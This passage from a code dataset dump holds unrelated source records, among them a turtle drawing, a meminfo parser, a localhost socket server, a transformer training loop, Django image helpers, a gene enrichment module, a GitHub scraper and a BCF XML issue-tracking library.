door\nt.pencolor(\"black\")\nt.penup()\nt.right(150)\nt.forward(size)\nt.left(90)\nt.forward(size*0.4)\nt.left(90)\nt.pendown()\nrectangle(size*0.4)\nt.right(90)\nt.forward(size*0.6)\n","sub_path":"03turtlepython/l2 4 houses.py","file_name":"l2 4 houses.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"149343138","text":"import re\nfrom util import LOGGER\n\n# Decent documentation of /proc/meminfo:\n# https://www.centos.org/docs/5/html/5.2/Deployment_Guide/s2-proc-meminfo.html\n# https://access.redhat.com/solutions/406773\n\n# An example is in test/proc-meminfo.tail\n\ndef parse_meminfo(stats, data):\n    for line in data:\n        parts = re.split('[ :]+', line.strip())\n        if len(parts) < 2:\n            LOGGER.debug('Skipping meminfo line that is too short: %s' % line)\n        else:\n            stats.meminfo[parts[0]] = int(parts[1]) * 1024","sub_path":"parsers/meminfo.py","file_name":"meminfo.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"148536383","text":"#!/bin/env python\n\nimport socket\n\nserver = socket.socket()\naddr = ('127.0.0.1',8080)\nserver.bind(addr)\nserver.listen(5)\n\nconn,address = server.accept()\n\nconn.send(b'hello, socket') # sockets carry bytes, not str, on Python 3\n\nconn.close()\n\n","sub_path":"day/socket/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"27524667","text":"\n\nfrom xai.brain.wordbase.nouns._treasurer import _TREASURER\n\n#class header\nclass _TREASURERS(_TREASURER, ):\n\tdef __init__(self,): \n\t\t_TREASURER.__init__(self)\n\t\tself.name = \"TREASURERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"treasurer\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_treasurers.py","file_name":"_treasurers.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"294395701","text":"# NOTE: imports implied by the snippet (AdamW with correct_bias=False matches\n# HuggingFace transformers); model, train_data_loader and EPOCHS are assumed\n# to be defined elsewhere.\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom transformers import AdamW, get_linear_schedule_with_warmup\n\noptimizer = AdamW(model.parameters(),lr = 2e-5, correct_bias=False)\n\ntotal_steps = len(train_data_loader) * EPOCHS\n\nscheduler = get_linear_schedule_with_warmup(\n    optimizer,\n    num_warmup_steps=0,\n    num_training_steps=total_steps\n)\nloss_fn = nn.CrossEntropyLoss()\n\ndef train_epoch(model, data_loader, loss_fn, optimizer, device, scheduler, n_examples):\n    model = model.train()\n    losses = []\n    correct_predictions = 0\n\n    for i in data_loader:\n        input_ids = i['input_ids']\n        attention_mask=i['attention_mask']\n        targets = i['targets']\n\n        outputs=model(input_ids = input_ids,attention_mask=attention_mask)\n\n        _ , preds = torch.max(outputs, dim=1)\n        loss = loss_fn(outputs, targets)\n\n        correct_predictions +=torch.sum(preds == targets)\n        losses.append(loss.item())\n\n        loss.backward()\n        nn.utils.clip_grad_norm_(model.parameters(), max_norm=1.0)\n        optimizer.step()\n        scheduler.step()\n        optimizer.zero_grad()\n    return correct_predictions.double() / n_examples, np.mean(losses)\n\n\ndef eval_model(model, data_loader, loss_fn, device, n_examples):
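\n    # (The source file is truncated at this point; it originally ended with a\n    # bare 'model'. What follows is a hedged sketch of a completion, mirroring\n    # train_epoch without gradient updates -- not the author's lost code.)\n    model = model.eval()\n    losses = []\n    correct_predictions = 0\n    with torch.no_grad():\n        for i in data_loader:\n            outputs = model(input_ids=i['input_ids'], attention_mask=i['attention_mask'])\n            _, preds = torch.max(outputs, dim=1)\n            loss = loss_fn(outputs, i['targets'])\n            correct_predictions += torch.sum(preds == i['targets'])\n            losses.append(loss.item())\n    return correct_predictions.double() / n_examples, np.mean(losses)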
","sub_path":"training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"360028461","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/image/utils.py\n\n.. contains helper functions for images\n   Django content Management System\n\nHans Rauch\nhans.rauch@gmx.net\n\nThe programs of the dms system can be used freely and adapted to\ntheir specific needs.\n\n0.01  22.03.2007  start of work\n\"\"\"\n\nimport string\nfrom PIL import Image\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\nfrom dms_ext.extension import *    # override dms functions\n\n# -----------------------------------------------------\ndef get_actions(request, user_perms, item_container):\n    from django.template.loader import get_template\n    from django.template import Context\n    t = get_template('app/file/manage_options.html')\n    nPos = max ( string.rfind ( request.path, '/add/' ),\n                 string.rfind ( request.path, '/edit/' ),\n               )\n    if nPos > -1 :\n        path = request.path[:nPos]\n        show_mode = True\n    else :\n        path = request.path\n        show_mode = False\n    if ( string.find(request.path, '/add/') >= 0 ) :\n        edit_mode = False\n    elif ( string.find(request.path, '/edit/') >= 0 ) :\n        edit_mode = False\n    else :\n        edit_mode = request.user.is_authenticated()\n    c = Context ( { 'authenticated' : request.user.is_authenticated(),\n                    'show_mode' : show_mode,\n                    'edit_mode' : edit_mode,\n                    'user_perms' : user_perms,\n                    'user_name' : request.user,\n                    'path' : get_site_url(item_container,\n                                          item_container.item.name), } )\n    return t.render ( c)\n\n# -----------------------------------------------------\ndef get_image_size(filename):\n    try:\n        im = Image.open(filename)\n        width = im.size[0]\n        height = im.size[1]\n    except:\n        width = height = 0\n    return width, height\n","sub_path":"image/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"633719472","text":"# -*- coding: UTF-8 -*-\r\nfrom itertools import islice\r\nimport pickle as pk\r\nfrom scipy import stats\r\n\r\n\r\nclass Enrichment(object):\r\n    def __init__(self,genelist_input):\r\n        pass\r\n\r\n        # build the data needed for the enrichment analysis\r\n        # self._build_enrichment_data_main()\r\n\r\n        # run the enrichment analysis\r\n        # self._enrichment_main()\r\n        self.genelist_input=genelist_input\r\n\r\n    def _enrichment_main(self):\r\n\r\n        gene_list = ['OGDH', 'DLST', 'BCAT1', 'ACACA', 'MAT1A', 'MAT2A', 'ALDH3B2', 'ALDH1A3',\r\n                     'ALDH3A1', 'PMM1', 'GMPPB', 'GMPPA', 'GMDS', 'TSTA3']\r\n        print(\"lucas--kuo_Enrichment.py--_enrichment_main get: \",self.genelist_input)\r\n        enrichment_data = 'static/kuo_enrichmentGO/enrichment_data.bin'\r\n        top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc = self.enrichment(self.genelist_input, enrichment_data)\r\n        return top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc\r\n\r\n\r\n    def _build_enrichment_data_main(self):\r\n        pass\r\n\r\n        self.path = 'I:\\\\Work\\\\rech\\\\SympGeneSet\\\\data\\\\enrichment\\\\data\\\\'\r\n        self.pathway_file = self.path + 'Pathway_genes.txt'\r\n        self.go_file = self.path + 'homo_GO_term_all.txt'\r\n        self.go_type_file = self.path + 'go_info.txt'\r\n        self.out_file = self.path + 'enrichment_data.bin'\r\n        self.build_enrichment_data()\r\n\r\n\r\n    def enrichment(self, gene_list, enrichment_data):\r\n        pass\r\n\r\n        # load pathways and go terms\r\n        pw_info, pw_genes, go_info, go_genes = self.load_enrichment_data(enrichment_data)\r\n\r\n        gene_set = set(gene_list)\r\n        n_gene = len(gene_set)\r\n\r\n        # get enriched pathways\r\n        pw_list = []\r\n        for pw_id, pw_gene_set in pw_genes.items():\r\n            inter_set = pw_gene_set & gene_set\r\n            if len(inter_set) == 0:
continue\r\n v00 = len(inter_set)\r\n v01 = n_gene - v00\r\n v10 = pw_info.get(pw_id)[1]\r\n v11 = pw_info.get(pw_id)[2]\r\n fourfold = [[v00, v01], [v10, v11]]\r\n odd_ratio, p_value = stats.fisher_exact(fourfold, alternative='greater')\r\n genes = ','.join(list(inter_set))\r\n pw_name = pw_info.get(pw_id)[0]\r\n if p_value < 0.05:\r\n pw_list.append([p_value, odd_ratio, pw_id, pw_name, v00, genes])\r\n\r\n pw_list.sort()\r\n # print(pw_list)\r\n top_pw_list = list()\r\n for temp in pw_list[0:10]:\r\n top_pw_list.append([str(x) for x in temp])\r\n\r\n\r\n\r\n # get enriched go terms (bp, mf, cc)\r\n go_genes_bp = go_genes.get('biological_process')\r\n go_genes_mf = go_genes.get('molecular_function')\r\n go_genes_cc = go_genes.get('cellular_component')\r\n\r\n top_go_list_bp = self.get_enriched_go(go_genes_bp, gene_list, go_info)\r\n top_go_list_mf = self.get_enriched_go(go_genes_mf, gene_list, go_info)\r\n top_go_list_cc = self.get_enriched_go(go_genes_cc, gene_list, go_info)\r\n\r\n print('pathway:', top_pw_list)\r\n print('top_go_list_bp:', top_go_list_bp)\r\n print('top_go_list_mf:', top_go_list_mf)\r\n print('top_go_list_cc:', top_go_list_cc)\r\n\r\n return top_pw_list, top_go_list_bp, top_go_list_mf, top_go_list_cc\r\n\r\n @staticmethod\r\n def get_enriched_go(go_genes, gene_list, go_info):\r\n gene_set = set(gene_list)\r\n n_gene = len(gene_set)\r\n go_list = []\r\n for go_id, go_gene_set in go_genes.items():\r\n inter_set = go_gene_set & gene_set\r\n if len(inter_set) == 0: continue\r\n v00 = len(inter_set)\r\n v01 = n_gene - v00\r\n v10 = go_info.get(go_id)[1]\r\n v11 = go_info.get(go_id)[2]\r\n fourfold = [[v00, v01], [v10, v11]]\r\n odd_ratio, p_value = stats.fisher_exact(fourfold, alternative='greater')\r\n genes = ','.join(list(inter_set))\r\n go_name = go_info.get(go_id)[0]\r\n if p_value < 0.05:\r\n go_list.append([p_value, odd_ratio, go_id, go_name, v00, genes])\r\n\r\n go_list.sort()\r\n top_go_list = list()\r\n for temp in go_list[0:10]:\r\n top_go_list.append([str(x) for x in temp])\r\n # top_go_list = [str(x) for x in go_list[0:10]]\r\n # print(top_go_list)\r\n return top_go_list\r\n\r\n @staticmethod\r\n def load_enrichment_data(enrichment_data):\r\n with open(enrichment_data, 'rb') as fr:\r\n pw_info = dict(pk.load(fr))\r\n pw_genes = dict(pk.load(fr))\r\n go_info = dict(pk.load(fr))\r\n go_genes = dict(pk.load(fr))\r\n return pw_info, pw_genes, go_info, go_genes\r\n\r\n\r\n def build_enrichment_data(self):\r\n\r\n pw_info = dict()\r\n pw_genes = dict()\r\n with open(self.pathway_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n p_name, pid, gene = line.strip().split('\\t')\r\n pw_info.setdefault(pid, [p_name.strip()])\r\n pw_genes.setdefault(pid, set())\r\n pw_genes[pid].add(gene)\r\n\r\n for pid, gene_set in pw_genes.items():\r\n pw_info[pid].append(len(gene_set))\r\n pw_info[pid].append(30000-len(gene_set))\r\n\r\n go_info = dict()\r\n go_genes = dict()\r\n go_genes.setdefault('biological_process', dict())\r\n go_genes.setdefault('molecular_function', dict())\r\n go_genes.setdefault('cellular_component', dict())\r\n\r\n go_type_dict = dict()\r\n with open(self.go_type_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n arr = line.strip().split('\\t')\r\n go_id = arr[0]\r\n go_type = arr[2]\r\n go_type_dict.setdefault(go_id, go_type)\r\n\r\n\r\n with open(self.go_file, 'r', encoding='utf8') as fr:\r\n for line in islice(fr, 1, None):\r\n arr = line.strip().split('\\t')\r\n gene = arr[2]\r\n go_id = arr[3]\r\n go_name 
= arr[4]\r\n go_info.setdefault(go_id, [go_name])\r\n\r\n go_type = go_type_dict.get(go_id)\r\n if go_type is not None:\r\n go_genes[go_type].setdefault(go_id, set())\r\n go_genes[go_type][go_id].add(gene)\r\n\r\n for _, go_dict in go_genes.items():\r\n for go_id, gene_set in go_dict.items():\r\n go_info[go_id].append(len(gene_set))\r\n go_info[go_id].append(30000-len(gene_set))\r\n\r\n\r\n with open(self.out_file, 'wb') as fw:\r\n fw.truncate()\r\n pk.dump(pw_info, fw, True)\r\n pk.dump(pw_genes, fw, True)\r\n pk.dump(go_info, fw, True)\r\n pk.dump(go_genes, fw, True)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n en = Enrichment()","sub_path":"kuo_Enrichment.py","file_name":"kuo_Enrichment.py","file_ext":"py","file_size_in_byte":6803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"81686612","text":"\"\"\"Scrapes Github for Fabrikate Component Information.\"\"\"\nfrom requests import get\nimport re\n\nfrom .component import Component\n\n# URL to the Fabrikate Component Definitions\nCOMP_DEFS_URL = \"https://api.github.com/repos/microsoft/fabrikate-definitions/contents/definitions\"\n\n\ndef get_repo_components():\n \"\"\"Return the Fabrikate Component List.\"\"\"\n json_obj = json_get(COMP_DEFS_URL)\n if json_obj:\n components = parse_json(json_obj)\n components = remove_fabrikate_prefix(components)\n return components\n raise Exception('JSON not retrieved. URL:{}'.format(COMP_DEFS_URL))\n\n\ndef parse_json(json_list):\n \"\"\"Parse json to get each component.\"\"\"\n components = []\n for entry in json_list:\n component = Component(entry[\"name\"], source=entry[\"html_url\"])\n components.append(component)\n return components\n\n\ndef remove_fabrikate_prefix(components):\n \"\"\"Remove the fabrikate prefix from the Component names.\"\"\"\n for component in components:\n component.name = re.sub('^fabrikate-', '', component.name)\n return components\n\n\ndef json_get(url):\n \"\"\"Get the json at the url.\"\"\"\n resp = get(url)\n if resp.status_code != 200:\n return None\n return resp.json()\n","sub_path":"hydrate/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298401431","text":"import os\nimport uuid\nimport shutil\nimport zipfile\nimport logging\nimport tempfile\nimport bcf.data\nfrom datetime import datetime\nfrom xml.dom import minidom\nfrom xmlschema import XMLSchema\nfrom contextlib import contextmanager\nfrom shutil import copyfile\n\n\ncwd = os.path.dirname(os.path.realpath(__file__))\n\n\n@contextmanager\ndef cd(newdir):\n prevdir = os.getcwd()\n os.chdir(os.path.expanduser(newdir))\n try:\n yield\n finally:\n os.chdir(prevdir)\n\n\nclass BcfXml:\n def __init__(self):\n self.filepath = None\n self.logger = logging.getLogger(\"bcfxml\")\n self.author = \"john@doe.com\"\n self.project = bcf.data.Project()\n self.version = \"2.1\"\n self.topics = {}\n\n def new_project(self):\n self.project.project_id = str(uuid.uuid4())\n self.project.name = \"New Project\"\n self.topics = {}\n if self.filepath:\n self.close_project()\n self.filepath = tempfile.mkdtemp()\n self.edit_project()\n self.edit_version()\n\n def get_project(self, filepath=None):\n if not filepath:\n return self.project\n zip_file = zipfile.ZipFile(filepath)\n self.filepath = tempfile.mkdtemp()\n zip_file.extractall(self.filepath)\n if os.path.isfile(os.path.join(self.filepath, \"project.bcfp\")):\n data = 
self._read_xml(\"project.bcfp\", \"project.xsd\")\n self.project.extension_schema = data[\"ExtensionSchema\"]\n if \"Project\" in data:\n self.project.project_id = data[\"Project\"][\"@ProjectId\"]\n self.project.name = data[\"Project\"].get(\"Name\")\n return self.project\n\n def edit_project(self):\n self.document = minidom.Document()\n root = self._create_element(self.document, \"ProjectExtension\")\n project = self._create_element(\n root, \"Project\", {\"ProjectId\": self.project.project_id}\n )\n self._create_element(project, \"Name\", text=self.project.name)\n self._create_element(root, \"ExtensionSchema\", text=\"extensions.xsd\")\n with open(os.path.join(self.filepath, \"project.bcfp\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def save_project(self, filepath):\n with cd(self.filepath):\n zip_file = zipfile.ZipFile(filepath, \"w\", zipfile.ZIP_DEFLATED)\n for root, dirs, files in os.walk(\"./\"):\n for file in files:\n zip_file.write(os.path.join(root, file))\n zip_file.close()\n\n def get_version(self):\n data = self._read_xml(\"bcf.version\", \"version.xsd\")\n self.version = data[\"@VersionId\"]\n return self.version\n\n def edit_version(self):\n self.document = minidom.Document()\n root = self._create_element(\n self.document, \"Version\", {\"VersionId\": self.version}\n )\n version = self._create_element(root, \"DetailedVersion\", text=self.version)\n with open(os.path.join(self.filepath, \"bcf.version\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def get_topics(self):\n self.topics = {}\n topics = []\n subdirs = []\n for (dirpath, dirnames, filenames) in os.walk(self.filepath):\n subdirs = dirnames\n break\n for subdir in subdirs:\n self.topics[subdir] = self.get_topic(subdir)\n return self.topics\n\n def get_header(self, guid):\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n if \"Header\" not in data:\n return\n header = bcf.data.Header()\n for item in data[\"Header\"][\"File\"]:\n header_file = bcf.data.HeaderFile()\n optional_keys = {\n \"filename\": \"Filename\",\n \"date\": \"Date\",\n \"reference\": \"Reference\",\n \"ifc_project\": \"@IfcProject\",\n \"ifc_spatial_structure_element\": \"@IfcSpatialStructureElement\",\n \"is_external\": \"@isExternal\",\n }\n for key, value in optional_keys.items():\n if value in item:\n setattr(header_file, key, item[value])\n header.files.append(header_file)\n self.topics[guid].header = header\n return header\n\n def get_topic(self, guid):\n if guid in self.topics:\n return self.topics[guid]\n data = self._read_xml(os.path.join(guid, \"markup.bcf\"), \"markup.xsd\")\n topic = bcf.data.Topic()\n self.topics[guid] = topic\n\n mandatory_keys = {\n \"guid\": \"@Guid\",\n \"title\": \"Title\",\n \"creation_date\": \"CreationDate\",\n \"creation_author\": \"CreationAuthor\",\n }\n for key, value in mandatory_keys.items():\n setattr(topic, key, data[\"Topic\"][value])\n\n optional_keys = {\n \"priority\": \"Priority\",\n \"index\": \"Index\",\n \"labels\": \"Labels\",\n \"reference_links\": \"ReferenceLink\",\n \"modified_date\": \"ModifiedDate\",\n \"modified_author\": \"ModifiedAuthor\",\n \"due_date\": \"DueDate\",\n \"assigned_to\": \"AssignedTo\",\n \"stage\": \"Stage\",\n \"description\": \"Description\",\n \"topic_status\": \"@TopicStatus\",\n \"topic_type\": \"@TopicType\",\n }\n for key, value in optional_keys.items():\n if value in data[\"Topic\"]:\n setattr(topic, key, data[\"Topic\"][value])\n\n if \"BimSnippet\" in 
data[\"Topic\"]:\n bim_snippet = bcf.data.BimSnippet()\n keys = {\n \"snippet_type\": \"@SnippetType\",\n \"is_external\": \"@IsExternal\",\n \"reference\": \"Reference\",\n \"reference_schema\": \"ReferenceSchema\",\n }\n for key, value in keys.items():\n if value in data[\"Topic\"][\"BimSnippet\"]:\n setattr(bim_snippet, key, data[\"Topic\"][\"BimSnippet\"][value])\n topic.bim_snippet = bim_snippet\n\n if \"DocumentReference\" in data[\"Topic\"]:\n for item in data[\"Topic\"][\"DocumentReference\"]:\n document_reference = bcf.data.DocumentReference()\n keys = {\n \"referenced_document\": \"ReferencedDocument\",\n \"is_external\": \"@IsExternal\",\n \"guid\": \"@Guid\",\n \"description\": \"Description\",\n }\n for key, value in keys.items():\n if value in item:\n setattr(document_reference, key, item[value])\n topic.document_references.append(document_reference)\n\n if \"RelatedTopic\" in data[\"Topic\"]:\n for item in data[\"Topic\"][\"RelatedTopic\"]:\n related_topic = bcf.data.RelatedTopic()\n related_topic.guid = item[\"@Guid\"]\n topic.related_topics.append(related_topic)\n return topic\n\n def add_topic(self, topic=None):\n if topic is None:\n topic = bcf.data.Topic()\n if not topic.guid:\n topic.guid = str(uuid.uuid4())\n if not topic.title:\n topic.title = \"New Topic\"\n os.mkdir(os.path.join(self.filepath, topic.guid))\n self.edit_topic(topic)\n return topic\n\n def edit_topic(self, topic):\n if not topic.creation_date:\n topic.creation_date = datetime.utcnow().isoformat()\n topic.creation_author = self.author\n else:\n topic.modified_date = datetime.utcnow().isoformat()\n topic.modified_author = self.author\n\n self.document = minidom.Document()\n root = self._create_element(self.document, \"Markup\")\n\n self.write_header(topic.header, root)\n\n topic_el = self._create_element(\n root,\n \"Topic\",\n {\n \"Guid\": topic.guid,\n \"TopicType\": topic.topic_type,\n \"TopicStatus\": topic.topic_status,\n },\n )\n\n for reference_link in topic.reference_links:\n self._create_element(topic_el, \"ReferenceLink\", text=reference_link)\n\n text_map = {\n \"Title\": topic.title,\n \"Priority\": topic.priority,\n \"Index\": topic.index,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(topic_el, key, text=value)\n\n for label in topic.labels:\n self._create_element(topic_el, \"Labels\", text=label)\n\n text_map = {\n \"CreationDate\": topic.creation_date,\n \"CreationAuthor\": topic.creation_author,\n \"ModifiedDate\": topic.modified_date,\n \"ModifiedAuthor\": topic.modified_author,\n \"DueDate\": topic.due_date,\n \"AssignedTo\": topic.assigned_to,\n \"Stage\": topic.stage,\n \"Description\": topic.description,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(topic_el, key, text=value)\n\n if topic.bim_snippet:\n bim_snippet = self._create_element(\n topic_el,\n \"BimSnippet\",\n {\n \"SnippetType\": topic.bim_snippet.snippet_type,\n \"isExternal\": topic.bim_snippet.is_external,\n },\n )\n self._create_element(\n bim_snippet, \"Reference\", text=topic.bim_snippet.reference\n )\n self._create_element(\n bim_snippet, \"ReferenceSchema\", text=topic.bim_snippet.reference_schema\n )\n for reference in topic.document_references:\n reference_el = self._create_element(\n topic_el,\n \"DocumentReference\",\n {\"Guid\": reference.guid, \"isExternal\": reference.is_external},\n )\n self._create_element(\n reference_el, \"ReferencedDocument\", text=reference.referenced_document\n )\n self._create_element(\n reference_el, \"Description\", 
text=reference.description\n )\n for related_topic in topic.related_topics:\n self._create_element(topic_el, \"RelatedTopic\", {\"Guid\": related_topic.guid})\n\n self.write_comments(topic.comments, root)\n self.write_viewpoints(topic.viewpoints, root, topic)\n\n with open(os.path.join(self.filepath, topic.guid, \"markup.bcf\"), \"wb\") as f:\n f.write(self.document.toprettyxml(encoding=\"utf-8\"))\n\n def write_header(self, header, root):\n if not header or not header.files:\n return\n header_el = self._create_element(root, \"Header\")\n for f in header.files:\n file_el = self._create_element(\n header_el,\n \"File\",\n {\n \"IfcProject\": f.ifc_project,\n \"IfcSpatialStructureElement\": f.ifc_spatial_structure_element,\n \"isExternal\": f.is_external,\n },\n )\n self._create_element(file_el, \"Filename\", text=f.filename)\n self._create_element(file_el, \"Date\", text=f.date)\n self._create_element(file_el, \"Reference\", text=f.reference)\n\n def write_comments(self, comments, root):\n for comment in comments.values():\n comment_el = self._create_element(root, \"Comment\", {\"Guid\": comment.guid})\n text_map = {\n \"Date\": comment.date,\n \"Author\": comment.author,\n \"Comment\": comment.comment,\n \"ModifiedDate\": comment.modified_date,\n \"ModifiedAuthor\": comment.modified_author,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(comment_el, key, text=value)\n if comment.viewpoint:\n self._create_element(\n comment_el, \"Viewpoint\", {\"Guid\": comment.viewpoint.guid}\n )\n\n def add_comment(self, topic, comment=None):\n if comment is None:\n comment = bcf.data.Comment()\n if not comment.guid:\n comment.guid = str(uuid.uuid4())\n if not comment.comment:\n comment.comment = \"'Free software' is a matter of liberty, not price. 
To understand the concept, you should think of 'free' as in 'free speech,' not as in 'free beer'.\"\n topic.comments[comment.guid] = comment\n self.edit_comment(comment, topic)\n\n def edit_comment(self, comment, topic):\n if not comment.date:\n comment.date = datetime.utcnow().isoformat()\n comment.author = self.author\n else:\n comment.modified_date = datetime.utcnow().isoformat()\n comment.modified_author = self.author\n self.edit_topic(topic)\n\n def delete_comment(self, guid, topic):\n if guid in topic.comments:\n del topic.comments[guid]\n self.edit_topic(topic)\n\n def delete_topic(self, guid):\n if guid in self.topics:\n del self.topics[guid]\n shutil.rmtree(os.path.join(self.filepath, guid))\n\n def write_viewpoints(self, viewpoints, root, topic):\n for viewpoint in viewpoints.values():\n viewpoint_el = self._create_element(\n root, \"ViewPoint\", {\"Guid\": viewpoint.guid}\n )\n text_map = {\n \"Viewpoint\": viewpoint.viewpoint,\n \"Snapshot\": viewpoint.snapshot,\n \"Index\": viewpoint.index,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(viewpoint_el, key, text=value)\n self.write_viewpoint(viewpoint, topic)\n\n def write_viewpoint(self, viewpoint, topic):\n document = minidom.Document()\n root = self._create_element(\n document, \"VisualizationInfo\", {\"Guid\": viewpoint.guid}\n )\n self.write_viewpoint_components(viewpoint, root)\n self.write_viewpoint_orthogonal_camera(viewpoint, root)\n self.write_viewpoint_perspective_camera(viewpoint, root)\n self.write_viewpoint_lines(viewpoint, root)\n self.write_viewpoint_clipping_planes(viewpoint, root)\n self.write_viewpoint_bitmaps(viewpoint, root)\n with open(\n os.path.join(self.filepath, topic.guid, viewpoint.viewpoint), \"wb\"\n ) as f:\n f.write(document.toprettyxml(encoding=\"utf-8\"))\n\n def write_viewpoint_components(self, viewpoint, parent):\n if not viewpoint.components:\n return\n components_el = self._create_element(parent, \"Components\")\n if viewpoint.components.view_setup_hints:\n view_setup_hints = self._create_element(\n components_el,\n \"ViewSetupHints\",\n {\n \"SpacesVisible\": viewpoint.components.view_setup_hints.spaces_visible,\n \"SpaceBoundariesVisible\": viewpoint.components.view_setup_hints.space_boundaries_visible,\n \"OpeningsVisible\": viewpoint.components.view_setup_hints.openings_visible,\n },\n )\n if viewpoint.components.selection:\n selection_el = self._create_element(components_el, \"Selection\")\n for selection in viewpoint.components.selection:\n self.write_component(selection, selection_el)\n visibility = self._create_element(\n components_el,\n \"Visibility\",\n {\"DefaultVisibility\": viewpoint.components.visibility.default_visibility},\n )\n if viewpoint.components.visibility.exceptions:\n exceptions_el = self._create_element(visibility, \"Exceptions\")\n for exception in viewpoint.components.visibility.exceptions:\n self.write_component(exception, exceptions_el)\n if viewpoint.components.coloring:\n coloring_el = self._create_element(components_el, \"Coloring\")\n for color in viewpoint.components.coloring:\n color_el = self._create_element(\n coloring_el, \"Color\", {\"Color\": color.color}\n )\n for component in color.components:\n self.write_component(component, color_el)\n\n def write_viewpoint_orthogonal_camera(self, viewpoint, parent):\n if not viewpoint.orthogonal_camera:\n return\n camera = viewpoint.orthogonal_camera\n camera_el = self._create_element(parent, \"OrthogonalCamera\")\n camera_view_point = self._create_element(camera_el, 
\"CameraViewPoint\")\n self.write_vector(camera_view_point, camera.camera_view_point)\n camera_direction = self._create_element(camera_el, \"CameraDirection\")\n self.write_vector(camera_direction, camera.camera_direction)\n camera_up_vector = self._create_element(camera_el, \"CameraUpVector\")\n self.write_vector(camera_up_vector, camera.camera_up_vector)\n self._create_element(\n camera_el, \"ViewToWorldScale\", text=camera.view_to_world_scale\n )\n\n def write_viewpoint_perspective_camera(self, viewpoint, parent):\n if not viewpoint.perspective_camera:\n return\n camera = viewpoint.perspective_camera\n camera_el = self._create_element(parent, \"PerspectiveCamera\")\n camera_view_point = self._create_element(camera_el, \"CameraViewPoint\")\n self.write_vector(camera_view_point, camera.camera_view_point)\n camera_direction = self._create_element(camera_el, \"CameraDirection\")\n self.write_vector(camera_direction, camera.camera_direction)\n camera_up_vector = self._create_element(camera_el, \"CameraUpVector\")\n self.write_vector(camera_up_vector, camera.camera_up_vector)\n self._create_element(camera_el, \"FieldOfView\", text=camera.field_of_view)\n\n def write_viewpoint_lines(self, viewpoint, parent):\n if not viewpoint.lines:\n return\n lines_el = self._create_element(parent, \"Lines\")\n for line in viewpoint.lines:\n line_el = self._create_element(lines_el, \"Line\")\n start_point_el = self._create_element(line_el, \"StartPoint\")\n self.write_vector(start_point_el, line.start_point)\n end_point_el = self._create_element(line_el, \"EndPoint\")\n self.write_vector(end_point_el, line.end_point)\n\n def write_viewpoint_clipping_planes(self, viewpoint, parent):\n if not viewpoint.clipping_planes:\n return\n planes_el = self._create_element(parent, \"ClippingPlanes\")\n for plane in viewpoint.clipping_planes:\n plane_el = self._create_element(planes_el, \"ClippingPlane\")\n location_el = self._create_element(plane_el, \"Location\")\n self.write_vector(location_el, plane.location)\n direction_el = self._create_element(plane_el, \"Direction\")\n self.write_vector(direction_el, plane.direction)\n\n def write_viewpoint_bitmaps(self, viewpoint, parent):\n if not viewpoint.bitmaps:\n return\n for bitmap in viewpoint.bitmaps:\n bitmap_el = self._create_element(parent, \"Bitmap\")\n\n text_map = {\"Bitmap\": bitmap.bitmap_type, \"Reference\": bitmap.reference}\n for key, value in text_map.items():\n self._create_element(bitmap_el, key, text=value)\n\n location_el = self._create_element(bitmap_el, \"Location\")\n self.write_vector(location_el, bitmap.location)\n normal_el = self._create_element(bitmap_el, \"Normal\")\n self.write_vector(normal_el, bitmap.normal)\n up_el = self._create_element(bitmap_el, \"Up\")\n self.write_vector(up_el, bitmap.up)\n\n self._create_element(bitmap_el, \"Height\", text=bitmap.height)\n\n def write_vector(self, parent, from_obj):\n self._create_element(parent, \"X\", text=from_obj.x)\n self._create_element(parent, \"Y\", text=from_obj.y)\n self._create_element(parent, \"Z\", text=from_obj.z)\n\n def write_component(self, data, parent):\n component_el = self._create_element(\n parent, \"Component\", {\"IfcGuid\": data.ifc_guid}\n )\n text_map = {\n \"OriginatingSystem\": data.originating_system,\n \"AuthoringToolId\": data.authoring_tool_id,\n }\n for key, value in text_map.items():\n if value:\n self._create_element(component_el, key, text=value)\n\n def add_viewpoint(self, topic, viewpoint=None):\n if not viewpoint:\n viewpoint = bcf.data.Viewpoint()\n if not 
